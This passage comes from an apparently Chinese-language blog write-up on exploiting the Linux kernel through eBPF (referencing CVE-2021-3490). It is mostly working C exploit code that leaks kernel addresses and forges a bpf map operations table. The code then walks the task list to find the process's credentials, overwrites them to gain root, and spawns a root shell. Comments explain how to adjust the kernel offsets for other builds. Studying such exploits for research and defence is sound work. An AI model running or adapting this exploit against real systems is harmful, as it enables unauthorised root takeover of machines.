	update_elem(0, 0); 		// value[0]=0x180000000; value[1]=0;
	update_elem(1, 0);
	size_t value = 0;
	write_msg();
	size_t ops_addr = get_elem(4); 		// 读取value[4]处的值
	printf("leak addr: 0x%llx\n", ops_addr); // 

#define LEAKED   0x10363e0 // (0x10169c0+0x180+0x640)     change 1  $ cat /tmp/kallsyms | grep startup_64   0xffffffffb7a6f200-0xffffffffb6a00000
	size_t linux_base = ops_addr - LEAKED;
	printf("linux base: 0x%llx\n", linux_base);
// Step 3: forge bpf_array->map->ops->map_push_elem = map_get_next_key, at &value[0]+0x80+0x70
	char ops[0xe8] = {0};
	for(int i=0;i<0xe8;i+=8)
	{
		*(size_t*)&ops[i] = read64(ops_addr + i);			// 在 &value[0]+0x80处伪造 bpf_array->map->ops 函数表
		update_elem(0x10+i/8, *(size_t*)&ops[i]);
	}
	size_t data = read64(ops_addr);
	update_elem(0x10+0x70/8, *(size_t*)&ops[0x20]);
// Step 4: leak value addr (bpf_array->value: save bpf brogram) (op=2)
	update_elem(0, 0);	// 0x180000000
	update_elem(1, 2);
	write_msg();
	size_t heap_addr = get_elem(4);
	size_t values_addr = heap_addr + 0x50;
	printf("value addr: 0x%llx\n", values_addr);
// Step 5: leak task_struct addr 	(op=1)
#define INIT_PID_NS  0x166b2c0 // 0x1647c00    change 2   $ cat /proc/kallsyms | grep init_pid_ns
	size_t init_pid_ns = linux_base+ INIT_PID_NS;
	printf("init_pid_ns addr: 0x%llx\n", init_pid_ns);  // 
	pid_t pid = getpid();
	printf("self pid is %d\n", pid);
	size_t task_addr = read64(init_pid_ns+0x30);  // 0x38 change 3   $ p *(struct task_struct*) xxxxxxxx   确认 init_pid_ns 的偏移0x38处存放 task_struct 地址（real_cred 和 cred 地址相同），Linux-5.11版本就是0x30
	printf("task_struct addr: 0x%llx\n", task_addr);  // 
// Step 6: leak cred addr (op=1)		遍历 task_struct->tasks->next 链表，读取指定线程的cred地址
	size_t cred_addr = 0;
	while(1)
	{
		pid_t p = read64(task_addr+0x918);    //  0x490   change 4   $ p/x &(*(struct task_struct *)0)->pid
		printf("iter pid %d ...\n", p);
		if(p == pid)
		{
			puts("got it!");
			cred_addr = read64(task_addr+0xad8);  // 0x638  change 5 $ p/x &(*(struct task_struct *)0)->cred
			break;
		}
		else
		{
			task_addr = read64(task_addr+0x818) - 0x818;  // 0x390 6  change 6 $ p/x &(*(struct task_struct *)0)->tasks    tasks-0x7d0    -0x780   children-0x8f0
			printf("[+] iter task %p ...\n", task_addr);
		}
	}
// Step 7: change cred  (op=3)
	printf("get cred_addr 0x%llx\n", cred_addr);
	size_t usage = read64(cred_addr);
	printf("usage: %d\n", usage);
	getchar();
	clear_btf();
	update_elem(0, 0);  	// 0x180000000
	update_elem(1, 3);
	update_elem(2, values_addr+0x80);
	write_msg();					// (1) 先篡改 bpf_array->map->ops = &value[0]+0x80; bpf_array->map->map_type=0x17; bpf_array->map->max_entries=-1; bpf_array->map->spin_lock_off=0;
	write32(cred_addr+4, 0);		// (2) 任意地址写，篡改cred
	write64(cred_addr+8, 0);
	write64(cred_addr+16, 0);
	if(getuid() == 0)
	{
		puts("getting shell!");
		system("/bin/sh");
	}
	
}

调试技巧

因为现在ebpf都默认会开启JIT优化，而不使用ebpf自带的解释器来执行。所以需要在编译内核时，将.config中的CONFIG_BPF_JIT参数关闭。然后调试时，即可直接下断点core.c:___bpf_prog_run
可以使用bpf_tools等工具来查看ebpf指令是否正确

参考

Kernel Pwning with eBPF: a Love Story

Linux_LPE_eBPF_CVE-2021-3490

本文作者： A1ex
本文链接： http://yoursite.com/2021/08/16/ebpf-pwn-A-Love-Story/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！